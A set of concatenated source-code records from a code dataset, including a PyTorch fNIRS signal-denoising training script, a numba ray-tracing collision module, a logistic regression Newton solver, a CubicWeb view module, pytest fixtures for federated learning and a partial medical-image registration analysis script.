    x1 = x[:, :, :512]\n        x2 = x[:, :, 512:]\n\n        x1 = self.forward_half(x1)\n        x2 = self.forward_half(x2)\n        x = torch.cat((x1, x2), dim=2)\n        b_s, _, f_n = x.size()\n        x = x.view(b_s, -1)\n        return x\nclass Net_8layers(nn.Module):\n    def __init__(self):\n        super(Net_8layers, self).__init__()\n        self.conv1 = BasicConv1d(1, 32, 7,padding = 3)\n        self.conv2 = BasicConv1d(32, 64, 3,padding = 1)\n        self.conv3 = BasicConv1d(64, 64, 3,padding = 1)\n        # dilation=2 with kernel 3 needs padding=2 to keep the sequence length\n        self.conv4 = BasicConv1d(64, 128, 3, dilation=2, padding = 2)\n        self.conv5 = BasicConv1d(128, 128, 3, dilation=2, padding = 2)\n        self.fc_1 = nn.Linear(128*64, 1024)\n        self.fc_2 = nn.Linear(1024, 128*64)\n        self.conv6 = BasicConv1d(128, 64, 3, padding = 1)\n        self.conv7 = BasicConv1d(64,64,3,padding = 1)\n        self.conv8 = BasicConv1d(64,32,3,padding = 1)\n        self.conv9 = BasicConv1d(32,32,3,padding = 1)\n        self.conv10 = BasicConv1d(32,1,3,padding = 1)\n        self.pool = nn.MaxPool1d(2)\n        self.up = nn.Upsample(scale_factor=2)\n        self.dout = nn.Dropout()\n    \n    def forward_half(self, x):\n        x = self.conv1(x)\n        x = self.pool(x)\n        x = self.conv2(x)\n        x = self.conv3(x)\n        x = self.pool(x)\n        x = self.conv4(x)\n        x = self.conv5(x)\n        x = self.pool(x)\n        # flatten (batch, 128, 64) -> (batch, 128*64) for the dense bottleneck\n        b_s, c_n, l_n = x.size()\n        x = F.relu(self.fc_1(x.view(b_s, -1)))\n        x = self.dout(x)\n        x = F.relu(self.fc_2(x))\n        # restore the (batch, channels, length) shape for the decoder\n        x = x.view(b_s, c_n, l_n)\n        x = self.up(x)\n        x = self.conv6(x)\n        x = self.conv7(x)\n        x = self.up(x)\n        x = self.conv8(x)\n        x = self.conv9(x)\n        x = self.up(x)\n        x = self.conv10(x)\n        return x\n\n    def forward(self, x):\n        b_s, f_n = x.size()\n        x = x.view(b_s, 1, f_n)\n        x1 = x[:, :, :512]\n        x2 = x[:, :, 512:]\n        \n        x1 = self.forward_half(x1)\n        x2 = self.forward_half(x2)\n        \n        x = torch.cat((x1, x2), dim=2)\n        b_s, _, f_n = x.size()\n        x = x.view(b_s, -1)\n        \n        return x\n    \ndef SNR_loss(y_pred):\n    batch_size, f_n = y_pred.size()\n    y_pred = y_pred.view(batch_size, 2, -1)\n    SNR = torch.std(y_pred, axis=2).mean()\n    return SNR\n\ndef std_loss(y_pred):\n    batch_size, f_n = y_pred.size()\n    y_pred = y_pred/1000000\n    y_pred = y_pred.view(batch_size, 1, f_n)\n    HbO = y_pred[:, :, :512]\n    HbR = y_pred[:, :, 512:]\n    d1 = 148*HbO+384*HbR\n    d2 = 252*HbO+179*HbR\n    d = torch.cat((d1,d2),axis = 1)\n    d = d*2.376*6\n    # batch_size * 2\n    std_diff = torch.std(d[:,:,1:]-d[:,:,:-1],axis = 2)\n#    max_diff = torch.zeros((batch_size,2,512-1),dtype=torch.double).cuda()\n    \n    diff = []\n    for ii in range(4):\n        lag = 
torch.abs(d[:,:,ii+1:]-d[:,:,:-(ii+1)])\n zero_pad = torch.zeros((batch_size,2,ii)).cuda().double()\n lag_zeros = torch.cat((lag,zero_pad),axis = 2)\n diff.append(lag_zeros.unsqueeze(0))\n# max_diff = torch.max(lag_zeros, max_diff,out=None)\n # 4 * batch_size * 2 *511\n diff = torch.cat(diff, axis=0) \n \n # 1 * batch * 2 * 1\n mc_thresh = (std_diff*10).unsqueeze(-1).unsqueeze(0)\n # 4 * batch_size * 2 *511\n mask_mc = (diff > mc_thresh).double()\n amp_thresh = (torch.ones(diff.size(),dtype=torch.double)*200).cuda()\n mask_amp = (diff > amp_thresh).double()\n mc_loss = (diff * mask_mc).sum() / (mask_mc.sum()+1e-7)\n amp_loss = (diff * mask_amp).sum() / (mask_amp.sum()+1e-7)\n# max_mc = torch.max(max_diff,mc_thresh,out=None)\n# amp_mc = torch.max(max_diff,amp_thresh,out=None)\n# std_loss_value = torch.max(max_mc+amp_mc)\n return mc_loss + amp_loss\n## load data\nnp.random.seed(50)\nX_train = scipy.io.loadmat('Processed_data/HRF_train_noised.mat')\nX_train = X_train['HRF_train_noised'];\nn = X_train.shape[0];\nX_train = np.concatenate((X_train[0:int(n/2),:],X_train[int(n/2):,:]),axis = 1)\nX_val = scipy.io.loadmat('Processed_data/HRF_val_noised.mat')\nX_val = X_val['HRF_val_noised'];\nn = X_val.shape[0];\nX_val = np.concatenate((X_val[0:int(n/2),:],X_val[int(n/2):,:]),axis = 1)\n\n\nX_test = scipy.io.loadmat('Processed_data/HRF_test_noised.mat')\nX_test = X_test['HRF_test_noised'];\nn = X_test.shape[0];\nX_test = np.concatenate((X_test[0:int(n/2),:],X_test[int(n/2):,:]),axis = 1)\n\nY_train = scipy.io.loadmat('Processed_data/HRF_train.mat')\nY_train = Y_train['HRF_train'];\nn = Y_train.shape[0];\nY_train = np.concatenate((Y_train[0:int(n/2),:],Y_train[int(n/2):,:]),axis = 1)\nY_val = scipy.io.loadmat('Processed_data/HRF_val.mat')\nY_val = Y_val['HRF_val'];\nn = Y_val.shape[0];\nY_val = np.concatenate((Y_val[0:int(n/2),:],Y_val[int(n/2):,:]),axis = 1)\nY_test = scipy.io.loadmat('Processed_data/HRF_test.mat')\nY_test = Y_test['HRF_test'];\nn = Y_test.shape[0];\nY_test = np.concatenate((Y_test[0:int(n/2),:],Y_test[int(n/2):,:]),axis = 1)\n\nx = np.concatenate((X_train,X_val),axis = 0)\ny = np.concatenate((Y_train,Y_val),axis = 0)\n\nidx = np.array(range(x.shape[0]))\nnp.random.shuffle(idx)\n\nx = x[idx,:]\ny = y[idx,:]\n\nX_train = x[:int(x.shape[0] * (8/9)),:]\nX_val = x[int(x.shape[0] * (8/9)):,:]\nY_train = y[:int(x.shape[0] * (8/9)),:]\nY_val = y[int(x.shape[0] * (8/9)):,:]\n\nX_real_HbO = scipy.io.loadmat('Processed_data/Real_HbO.mat')\nX_real_HbO = X_real_HbO['Real_HbO'];\nX_real_HbR = scipy.io.loadmat('Processed_data/Real_HbR.mat')\nX_real_HbR = X_real_HbR['Real_HbR'];\nX_real = np.concatenate((X_real_HbO,X_real_HbR),axis = 1)\n\nX_train = X_train*1000000\nX_val = X_val*1000000\nX_test = X_test*1000000\n\nY_train = Y_train*1000000\nY_val = Y_val*1000000\nY_test = Y_test*1000000\n\nX_real = X_real*1000000\n\nprint(X_train.shape)\nprint(X_val.shape)\nprint(X_test.shape)\nprint(X_real.shape)\n\nX_train = X_train[:,:]\nY_train = Y_train[:,:]\nX_val = X_val[:,:]\nY_val = Y_val[:,:]\nX_test = X_test[:,:]\nY_test = Y_test[:,:]\nX_real = X_real[:,:]\n\ntrain_set = Dataset(X_train, Y_train)\nval_set = Dataset(X_val, Y_val)\ntest_set = Dataset(X_test, Y_test) \nreal_set = Dataset(X_real) \n# %% define data loaders\ntrainloader = torch.utils.data.DataLoader(\n dataset = train_set,\n batch_size=512,\n sampler = tordata.RandomSampler(train_set),\n num_workers=2)\n\nvalloader = torch.utils.data.DataLoader(\n dataset = val_set, \n batch_size=512,\n sampler = tordata.SequentialSampler(val_set),\n 
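# The lagged-difference masking inside std_loss, isolated on a toy CPU tensor so the
# shapes are easy to follow -- a sketch; the original runs the same math on CUDA.
import torch

d = torch.randn(2, 2, 512, dtype=torch.double)             # batch x channels x time
std_diff = torch.std(d[:, :, 1:] - d[:, :, :-1], dim=2)    # first-difference std per channel
diff = []
for ii in range(4):
    lag = torch.abs(d[:, :, ii + 1:] - d[:, :, :-(ii + 1)])
    zero_pad = torch.zeros((2, 2, ii), dtype=torch.double)
    diff.append(torch.cat((lag, zero_pad), dim=2).unsqueeze(0))
diff = torch.cat(diff, dim=0)                              # 4 x batch x channels x 511
mask = (diff > (std_diff * 10).unsqueeze(-1).unsqueeze(0)).double()
print(((diff * mask).sum() / (mask.sum() + 1e-7)).item())  # the motion-artifact penalty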
num_workers=2)\n\ntestloader = torch.utils.data.DataLoader(\n dataset = test_set, \n batch_size=512,\n sampler = tordata.SequentialSampler(test_set),\n num_workers=2)\n\nrealloader = torch.utils.data.DataLoader(\n dataset = real_set, \n batch_size=32,\n sampler = tordata.SequentialSampler(real_set),\n num_workers=2)\n# %% trian and validate\ndata_loaders = {\"train\": trainloader, \"val\": valloader}\nmodel = ['4layers','8layers']\n\nn_epochs = 100\nprint('start')\nfor model_name in model:\n print('Model:', model_name)\n if model_name == '4layers':\n net = Net_4layers().cuda()\n elif model_name == '8layers':\n net = Net_8layers().cuda()\n train_loss1 = []\n val_loss1 = []\n train_loss2 = []\n val_loss2 = []\n train_loss3 = []\n val_loss3 = []\n train_loss = []\n val_loss = []\n optimizer = optim.Adam(net.parameters(), lr=0.01)\n scheduler = StepLR(optimizer, step_size = 50, gamma=0.1)\n lowest_val_loss = 1e6;\n hdf5_filepath = \"networks/\" + model_name\n for epoch in range(n_epochs): # loop over the dataset multiple times\n print('Epoch {}/{}'.format(epoch, n_epochs - 1))\n print('-' * 10)\n for phase in ['train','val']:\n if phase == 'train':\n net.train() # Set model to training mode\n else:\n net.eval()\n running_loss1 = 0.0\n running_loss2 = 0.0\n running_loss3 = 0.0\n running_loss = 0.0\n for i, data in enumerate(data_loaders[phase], 0):\n # get the inputs; data is a list of [inputs, labels]\n inputs, y_true = data\n # zero the parameter gradients\n optimizer.zero_grad()\n # forward + backward + optimize\n outputs = net(inputs.cuda().float())\n outputs = outputs.double()\n mse_loss = nn.MSELoss()\n loss1 = mse_loss(outputs, y_true.cuda())\n loss2 = SNR_loss(outputs)\n loss3 = std_loss(outputs)\n \n loss = loss1 + 0.01 *(loss2 + loss3)\n\n if phase == 'train':\n loss.backward()\n optimizer.step()\n running_loss1 += loss1.item()\n running_loss2 += loss2.item()\n running_loss3 += loss3.item()\n running_loss += loss.item()\n epoch_loss1 = running_loss1 / len(data_loaders[phase])\n epoch_loss2 = running_loss2 / len(data_loaders[phase])\n epoch_loss3 = running_loss3 / len(data_loaders[phase])\n epoch_loss = running_loss / len(data_loaders[phase])\n if phase == 'train':\n train_loss1.append(epoch_loss1)\n train_loss2.append(epoch_loss2)\n train_loss3.append(epoch_loss3)\n train_loss.append(epoch_loss) # Set model to training mode\n else:\n val_loss1.append(epoch_loss1)\n val_loss2.append(epoch_loss2)\n val_loss3.append(epoch_loss3)\n val_loss.append(epoch_loss)\n if epoch_loss < lowest_val_loss:\n lowest_val_loss = epoch_loss\n torch.save(net.state_dict(), hdf5_filepath)\n print('{} Loss: {:.5f}; loss1: {:.5f}; loss2: {:.5f};loss3: {:.5f}'.format(\n phase, epoch_loss, epoch_loss1, epoch_loss2, epoch_loss3))\n scheduler.step()\n\n print('Finished Training')\n plt.figure()\n vl, = plt.plot(val_loss1,'r')\n tl, = plt.plot(train_loss1,'b')\n plt.legend([tl,vl],['training loss', 'validation loss'],)\n figurepath = \"Figures/\" + model_name+\"_1\"+\".png\"\n plt.savefig(figurepath, transparent=True)\n plt.figure()\n vl, = plt.plot(val_loss2,'r')\n tl, = plt.plot(train_loss2,'b')\n plt.legend([tl,vl],['training loss', 'validation loss'],)\n figurepath = \"Figures/\" + model_name+\"_2\"+\".png\"\n plt.savefig(figurepath, transparent=True)\n plt.figure()\n vl, = plt.plot(val_loss3,'r')\n tl, = plt.plot(train_loss3,'b')\n plt.legend([tl,vl],['training loss', 'validation loss'],)\n figurepath = \"Figures/\" + model_name+\"_3\"+\".png\"\n plt.savefig(figurepath, transparent=True)\n plt.figure()\n vl, = 
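# The validation-driven checkpointing used in the loop above, reduced to its core --
# a sketch with a stand-in linear model; 'best.pt' is an illustrative path.
import torch
from torch import nn

model = nn.Linear(4, 2)
lowest_val_loss = float('inf')
for epoch_loss in [0.9, 0.4, 0.6]:                 # pretend validation losses
    if epoch_loss < lowest_val_loss:
        lowest_val_loss = epoch_loss
        torch.save(model.state_dict(), 'best.pt')  # keep only the best weights
model.load_state_dict(torch.load('best.pt'))       # restore before testing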
plt.plot(val_loss,'r')\n    tl, = plt.plot(train_loss,'b')\n    plt.legend([tl,vl],['training loss', 'validation loss'],)\n    figurepath = \"Figures/\" + model_name+\"_all\"+\".png\"\n    plt.savefig(figurepath, transparent=True)\n    print('Finished Fig saving')\n\n    trainlosspath = \"Processed_data/train_loss_\" + model_name+\".txt\"\n    np.savetxt(trainlosspath, np.array(train_loss), fmt=\"%s\")\n    vallosspath = \"Processed_data/val_loss_\" + model_name+\".txt\"\n    np.savetxt(vallosspath, np.array(val_loss), fmt=\"%s\")\n    print('Finished writing loss files')\n\n    net.load_state_dict(torch.load(hdf5_filepath))\n    print('loaded nn file')\n\n    Y_test = []\n    for i, data in enumerate(testloader, 0):\n        inputs = data[0]\n        outputs = net(inputs.cuda().float())\n        Y_test.append(outputs.cpu().data.numpy())\n    Y_test = np.concatenate(Y_test, axis=0)\n    Y_test = Y_test/1000000\n    savefilepath = \"Processed_data/Test_NN_\" + model_name+\".mat\"\n    scipy.io.savemat(savefilepath,{'Y_test': Y_test})\n    \n    Y_real = []\n    for i, data in enumerate(realloader, 0):\n        inputs = data[0]\n        outputs = net(inputs.cuda().float())\n        Y_real.append(outputs.cpu().data.numpy())\n    Y_real = np.concatenate(Y_real, axis=0)\n    Y_real = Y_real/1000000\n    savefilepath = \"Processed_data/Real_NN_\" + model_name+\".mat\"\n    scipy.io.savemat(savefilepath,{'Y_real': Y_real})\n    \n    print('Saved predicted data')","sub_path":"fNIRS_denoise_pytorch_2(1).py","file_name":"fNIRS_denoise_pytorch_2(1).py","file_ext":"py","file_size_in_byte":14107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"234483282","text":"from primitives import Ray, Triangle, Box, BoxStack\nimport numpy as np\nimport numba\nfrom constants import COLLISION_SHIFT\n\n\n@numba.jit(nogil=True, fastmath=True)\ndef ray_triangle_intersect(ray: Ray, triangle: Triangle):\n    if np.dot(ray.direction, triangle.normal) >= 0:\n        return None\n    h = np.cross(ray.direction, triangle.e2)\n    a = np.dot(h, triangle.e1)\n\n    if a <= 0:\n        return None\n\n    f = 1. / a\n    s = ray.origin - triangle.v0\n    u = f * np.dot(s, h)\n    if u < 0. or u > 1.:\n        return None\n    q = np.cross(s, triangle.e1)\n    v = f * np.dot(q, ray.direction)\n    if v < 0. or v > 1.:\n        return None\n\n    if (1 - u - v) < 0. 
or (1 - u - v) > 1.:\n return None\n\n t = f * np.dot(triangle.e2, q)\n if t > COLLISION_SHIFT:\n return t\n else:\n return None\n\n\n@numba.jit(nogil=True, fastmath=True)\ndef ray_box_intersect(ray: Ray, box: Box):\n txmin = (box.bounds[ray.sign[0]][0] - ray.origin[0]) * ray.inv_direction[0]\n txmax = (box.bounds[1 - ray.sign[0]][0] - ray.origin[0]) * ray.inv_direction[0]\n tymin = (box.bounds[ray.sign[1]][1] - ray.origin[1]) * ray.inv_direction[1]\n tymax = (box.bounds[1 - ray.sign[1]][1] - ray.origin[1]) * ray.inv_direction[1]\n\n if txmin > tymax or tymin > txmax:\n return False, 0., 0.\n tmin = max(txmin, tymin)\n tmax = min(txmax, tymax)\n\n tzmin = (box.bounds[ray.sign[2]][2] - ray.origin[2]) * ray.inv_direction[2]\n tzmax = (box.bounds[1 - ray.sign[2]][2] - ray.origin[2]) * ray.inv_direction[2]\n\n if tmin > tzmax or tzmin > tmax:\n return False, 0., 0.\n tmin = max(tmin, tzmin)\n tmax = min(tmax, tzmax)\n if tmax > COLLISION_SHIFT:\n return True, tmin, tmax\n else:\n return False, 0., 0.\n\n\n@numba.jit(nogil=True, fastmath=True)\ndef bvh_hit_inner(ray: Ray, box: Box, least_t: float):\n hit, t_low, t_high = ray_box_intersect(ray, box)\n return hit and t_low <= least_t\n\n\n@numba.jit(nogil=True, fastmath=True)\ndef bvh_hit_leaf(ray: Ray, box: Box, least_t):\n hit, t_low, t_high = ray_box_intersect(ray, box)\n if not hit:\n return None, least_t\n least_hit = None\n for triangle in box.triangles:\n t = ray_triangle_intersect(ray, triangle)\n if t is not None and 0 < t < least_t:\n least_t = t\n least_hit = triangle\n return least_hit, least_t\n\n\n@numba.njit\ndef visibility_test(root: Box, ray_a: Ray, ray_b: Ray):\n delta = ray_b.origin - ray_a.origin\n least_t = np.linalg.norm(delta)\n direction = delta / least_t\n if np.dot(ray_a.normal, direction) <= 0 or np.dot(ray_b.normal, -1 * direction) <= 0:\n return False\n test_ray = Ray(ray_a.origin, direction)\n stack = BoxStack()\n stack.push(root)\n while stack.size:\n box = stack.pop()\n if box.left is not None and box.right is not None:\n if bvh_hit_inner(test_ray, box, least_t):\n stack.push(box.left)\n stack.push(box.right)\n else:\n hit, t = bvh_hit_leaf(test_ray, box, least_t)\n if hit is not None and t < least_t:\n return False\n return True\n\n\n@numba.njit\ndef traverse_bvh(root: Box, ray: Ray):\n least_t = np.inf\n least_hit = None\n stack = BoxStack()\n stack.push(root)\n while stack.size:\n box = stack.pop()\n if box.left is not None and box.right is not None:\n if bvh_hit_inner(ray, box, least_t):\n stack.push(box.left)\n stack.push(box.right)\n else:\n hit, t = bvh_hit_leaf(ray, box, least_t)\n if hit is not None and t < least_t:\n least_hit = hit\n least_t = t\n\n return least_hit, least_t\n","sub_path":"src/collision.py","file_name":"collision.py","file_ext":"py","file_size_in_byte":3705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"383344436","text":"import matplotlib.pyplot as plt\nimport numpy as np \n\n# x = np.arange(-4,4,.1)\n# x = np.linspace(-4,4,25)\nx = np.linspace(0, 2*np.pi, 50)\ny = np.sin(x)\n# y = np.square(x)\ny2 = np.cos(x)\n# y2 = y+2\nplt.grid(True)\nplt.xlabel(\"sin X\")\nplt.ylabel(\"cos X\")\nplt.title(\"My Graph\")\n# plt.axis([0,5, 2, 11])\nplt.plot(x, y, 'r-*', linewidth = 2, markersize = 7, label='Red') #r=red colour, - continous line, * is points\nplt.plot(x, y2, 'b-o', linewidth = 2, markersize = 7, label='blue')\nplt.legend(loc='lower left')#loc defines 
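# The same Moller-Trumbore test as ray_triangle_intersect above, rewritten without
# the custom Ray/Triangle types so it can be sanity-checked standalone -- a sketch;
# the triangle below is an arbitrary counter-clockwise example.
import numpy as np

def hit_t(origin, direction, v0, v1, v2, eps=1e-7):
    e1, e2 = v1 - v0, v2 - v0
    h = np.cross(direction, e2)
    a = np.dot(h, e1)
    if a <= 0:                          # back-facing or parallel
        return None
    f = 1.0 / a
    s = origin - v0
    u = f * np.dot(s, h)
    if u < 0.0 or u > 1.0:
        return None
    q = np.cross(s, e1)
    v = f * np.dot(q, direction)
    if v < 0.0 or u + v > 1.0:
        return None
    t = f * np.dot(e2, q)
    return t if t > eps else None

print(hit_t(np.array([0., 0., -1.]), np.array([0., 0., 1.]),
            np.array([-1., -1., 0.]), np.array([0., 1., 0.]),
            np.array([1., -1., 0.])))  # prints 1.0 for this ray/triangle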
location\nplt.show()\n","sub_path":"pyPro/matPlotLib/matBasic1.py","file_name":"matBasic1.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"20756280","text":"from algorithms.clf import Clf\nfrom scipy.special import expit\nimport scipy.sparse.linalg\nimport numpy as np\nimport sys\nsys.path.append(r'..')\n\n\n\"\"\"\nPreconditioned Conjugate Gradient Method\n\"\"\"\n\ndef precond(M, r):\n\tq = M * r\n\treturn q\n\n\ndef cg(A, b, x=None, tol=1.0e-3, max_iter=100):\n\t# precondition\t\n    A = np.matrix(A); b = np.matrix(b);\n    A_scaling = np.linalg.norm(A)\n    b_scaling = np.linalg.norm(b)\n    A = A / A_scaling\n    b = b / b_scaling\n    normb = np.linalg.norm(b, 'fro')\n    m = b.shape[0]\n    if np.linalg.norm(A,'fro') > 1e-12:\n    \tM = np.linalg.inv(np.diag(np.diag(A.T*A)))\n    else:\n    \tM = np.eye(m)\n    x = np.zeros((m, 1))\n    Aq = np.dot(A, x) \n    r = b - Aq\n    q = precond(M, r) \t\n    tau_old = np.linalg.norm(q)\n    rho_old = np.dot(r.T, q)\n    theta_old = 0\n    Ad = np.zeros((m, 1))\n    d = np.zeros((m, 1))\n    res = r\n    \n    tiny = 1e-30\n    for i in range(max_iter):\n        Aq = np.dot(A, q)\n        sigma = np.dot(q.T, Aq)\n        \n        if abs(sigma.item()) < tiny:\n        \tbreak\n        else:\n            alpha = rho_old / sigma;\n            alpha = alpha.item()\n            r = r - alpha * Aq\n        u = precond(M, r)\n\n        theta = np.linalg.norm(u)/tau_old\n        c = 1 / np.sqrt(1+theta*theta)\n        tau = tau_old * theta * c\n        gam = c*c*theta_old*theta_old\n        eta = c*c*alpha\n        d = gam * d + eta * q\n        x = x + d\n\n        # stop\n        Ad = gam*Ad+eta*Aq\n        res = res - Ad\n        if np.linalg.norm(res) < tol*normb:\n            break\n        else:\n            rho = np.dot(r.T, u)\n            beta = rho / rho_old\n            beta = beta.item()\n            q = u + beta * q\n\n            rho_old = rho\n            tau_old = tau\n            theta_old = theta\n    return x * (b_scaling / A_scaling)\n\n\nclass Newton_m53():\n    \"\"\"docstring for LogReg_NewtonMethod_GoldenVersion\"\"\"\n\n    def p1(self, x):\n        # avoid overflow\n        return .5 * (1 + np.tanh(.5 * x))\n        # return 1/(1+np.exp(-x))\n\n    def delta(self, beta, X, y):\n        n = X.shape[1]\n        tmp = beta.copy(); tmp[n-1] = 0;\n        grad = - X.T * (y - self.p1(X * beta)) + 1*tmp\n        temp = np.multiply(self.p1(X * beta), (1 - self.p1(X * beta)))\n        temp = np.tile(temp, (1, X.shape[1]))\n        tmp = np.eye(n); tmp[n-1,n-1] = 0;\n        hessian = X.T * np.multiply(X, temp) + 1*tmp\n        return grad, hessian\n\n    # newtonMethod\n    def fit(self, X_train, y_train, max_iter=100, tol=1e-3):\n        X = np.mat(X_train.copy()) # convert to NumPy matrix\n        y = np.mat(y_train.copy()).transpose() # convert to NumPy matrix\n\n        # label -1 by 0 if exists\n        y[y == -1] = 0\n\n        m, n = np.shape(X)\n\n        # add logitR to verify the correctness\n        # from sklearn.linear_model import LogisticRegression\n        # LogitR = LogisticRegression(solver='lbfgs').fit(X, np.array(y).ravel())\n        # w1 = LogitR.coef_; b1 = LogitR.intercept_\n        # w1 = w1.reshape(-1); b1 = b1[0]\n        # \n        X = np.column_stack((X, np.ones((m, 1))))\n\n        # initial\n        w = np.zeros((n+1, 1))\n        for k in range(max_iter):\n            # compute gradient and hessian\n            grad, hessian = self.delta(w, X, y)\n            # compute newton direction\n            # d = scipy.sparse.linalg.cg(hessian, grad)[0]\n            d = cg(hessian, grad)\n            d = d.reshape(-1, 1)\n            # update w\n            w = w - d\n            if np.linalg.norm(grad) < tol:\n                break\n\n        #if k == max_iter - 1:\n        #    print('convergence fail, the current norm of gradient is {}'.format(\n        #        np.linalg.norm(grad)))\n\n        w = np.array(w).flatten()\n        b = w[-1]\n        w = w[0:w.shape[0]-1]\n\n        # print(np.linalg.norm(w1-w), b, b1)\n\n        clf = Clf(w, 
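# A quick sanity check for the cg solver above on a small SPD system -- a sketch;
# once the solver converges, the two printed vectors should roughly agree.
import numpy as np

A = np.array([[4., 1.], [1., 3.]])
b = np.array([[1.], [2.]])
print(np.asarray(cg(A, b)).ravel())   # iterative solution from the solver above
print(np.linalg.solve(A, b).ravel())  # direct reference solution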
b)\n return clf\n","sub_path":"algorithms/Logistic_regression/Newton/Newton_m53.py","file_name":"Newton_m53.py","file_ext":"py","file_size_in_byte":3845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"519109400","text":"##########################################################################\n# NSAp - Copyright (C) CEA, 2013\n# Distributed under the terms of the CeCILL-B license, as published by\n# the CEA-CNRS-INRIA. Refer to the LICENSE file or to\n# http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.html\n# for details.\n##########################################################################\n\n# Cubicweb import\nfrom cubicweb.web.views.startup import IndexView\nfrom cubicweb.predicates import is_instance\nfrom cubicweb.web.views.primary import PrimaryView\n\n# Cubes import\nfrom cubes.brainomics.views.startup import BrainomicsIndexView\n\n\nclass NSIndexView(IndexView):\n \"\"\" Class that defines the piws index view.\n \"\"\"\n\n def call(self, **kwargs):\n \"\"\" Create the 'index' like page of our site.\n \"\"\"\n # Get the card that contains some text description about this site\n rset = self._cw.execute(\"Any X WHERE X is Card, X title 'index'\")\n self.wview(\"primary\", rset=rset)\n\n\n###############################################################################\n# Card View\n###############################################################################\n\nclass NSCardView(PrimaryView):\n \"\"\" Class that that defines how we print card entities.\n \"\"\"\n __select__ = PrimaryView.__select__ & is_instance(\"Card\")\n\n def call(self, rset=None, **kwargs):\n \"\"\" Format the card entity content.\n \"\"\"\n # Get the rset\n rset = self.cw_rset or rset\n\n # Get additional resources links\n resources = {\n \"demo-url\": \"http://mart.intra.cea.fr/senior/\",\n \"license-url\": self._cw.build_url(\"license\"),\n \"connect-image\": self._cw.data_url(\"images/dreamstime_s_33211444.jpg\"),\n \"database-image\": self._cw.data_url(\"images/dreamstime_s_32994616.jpg\"),\n \"nsap-image\": self._cw.data_url(\"images/nsap.png\"),\n \"nsap-url\": \"https://bioproj.extra.cea.fr/redmine/projects/nsap\",\n }\n\n # Update card links links to content\n content = rset.get_entity(0, 0).content\n content = content % resources\n self.w(content)\n\n\ndef registration_callback(vreg):\n vreg.register_and_replace(NSIndexView, BrainomicsIndexView)\n vreg.register(NSCardView)\n","sub_path":"piws/views/startup.py","file_name":"startup.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"438097448","text":"\"\"\"Contains fixtures used across the module.\"\"\"\nimport pytest\n\n\n@pytest.fixture(name=\"global_vars\")\ndef fixture_global_vars():\n \"\"\"Defines the characteristics of the federated simulation.\"\"\"\n federated_learning_variables = {\"n_features\": 23,\n \"n_classes\": 2,\n \"n_embeddings\": 3,\n \"num_data\": 100,\n \"batch_size\": 32,\n \"n_nodes\": 3,\n \"metrics\": [0, 1, 2, 3]}\n\n return federated_learning_variables\n\n\nclass Helpers:\n \"\"\"Delivers static helper functions to avoid duplicated code.\"\"\"\n\n @staticmethod\n def check_initialization(federated_government):\n \"\"\"Checks the initialization of high-level federated learning objects.\"\"\"\n assert hasattr(federated_government, \"_nodes_federation\")\n assert hasattr(federated_government, \"_server\")\n\n @staticmethod\n def 
check_initialization_high_level(federated_government, fed_gov_init):\n \"\"\"Checks the initialization of high-level federated learning objects.\"\"\"\n fed_gov_init.assert_called_once()\n assert hasattr(federated_government, \"_test_data\")\n assert hasattr(federated_government, \"_test_labels\")\n\n\n@pytest.fixture\ndef helpers():\n \"\"\"Returns the helpers class.\"\"\"\n return Helpers\n","sub_path":"test/federated_government/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"249097019","text":"import os\nimport numpy as np \nimport matplotlib.pyplot as plt\nimport nibabel as nib\nimport glob\n\nclass Patient():\n\tdef __init__(self, dir_name = \"\"):\n\t\t\n\t\tself.studyList = glob.glob('????????_??????.nii')\n\t\tself.studyList.sort()\n\n\t\t# declare the reference week 0 scan\n\t\tself.ref = self.studyList[0]\n\t\t# week 3\n\t\tself.flo1 = self.studyList[1]\n\t\t# week 8\n\t\tself.flo2 = self.studyList[2]\n\nclass Similarity( Patient ):\n\tdef __init__(self, pat ):\n\t\t# initialise all of the similarity measure lists\n\t\tlnccList = glob.glob('lncc*.txt')\n\t\tnovelLnccList = glob.glob('novel_lncc*.txt')\n\t\tself.regList = self.getRegParams(lnccList)\n\t\tPlotSim( self )\n\n\tdef getRegParams(self, regList):\n\t\t# now perform analysis\n\t\tregList2 = []\n\t\tfor regType in regList:\n\t\t\treg = Registration(regType)\n\t\t\tregList2.append(reg)\n\t\treturn regList2\t\n\nclass PlotSim( Similarity ):\n\tdef __init__( self, sim ):\n\t\tcpList = []\n\t\tmeasureList = []\n\t\tfor reg in sim.regList:\n\t\t\t# this is where you can change what you want to \n\t\t\t# examine! \n\t\t\tif reg.be == 0.01 and reg.week == 3:\n\t\t\t\tcpList.append(reg.cp)\n\t\t\t\tmeasureList.append(reg.measure)\n\n\t\tcpList, measureList = zip(*sorted(zip(cpList,measureList)))\n\t\tcps = np.array(cpList)\n\t\tmeasures = np.array(measureList)\n\t\tfig = plt.figure()\n\t\tplt.plot(cps, measures)\n\t\tplt.show()\n\n\t\tbeList = []\n\t\tmeasureList = []\n\t\tfor reg in sim.regList:\n\t\t\t# this is where you can change what you want to \n\t\t\t# examine! 
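# How a test module would consume the conftest fixtures above -- a sketch using a
# dummy object so it runs standalone; real tests build an actual federated government.
class _Dummy:
    def __init__(self):
        self._nodes_federation = object()
        self._server = object()

def test_initialization(helpers):
    helpers.check_initialization(_Dummy())  # passes: both attributes are present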
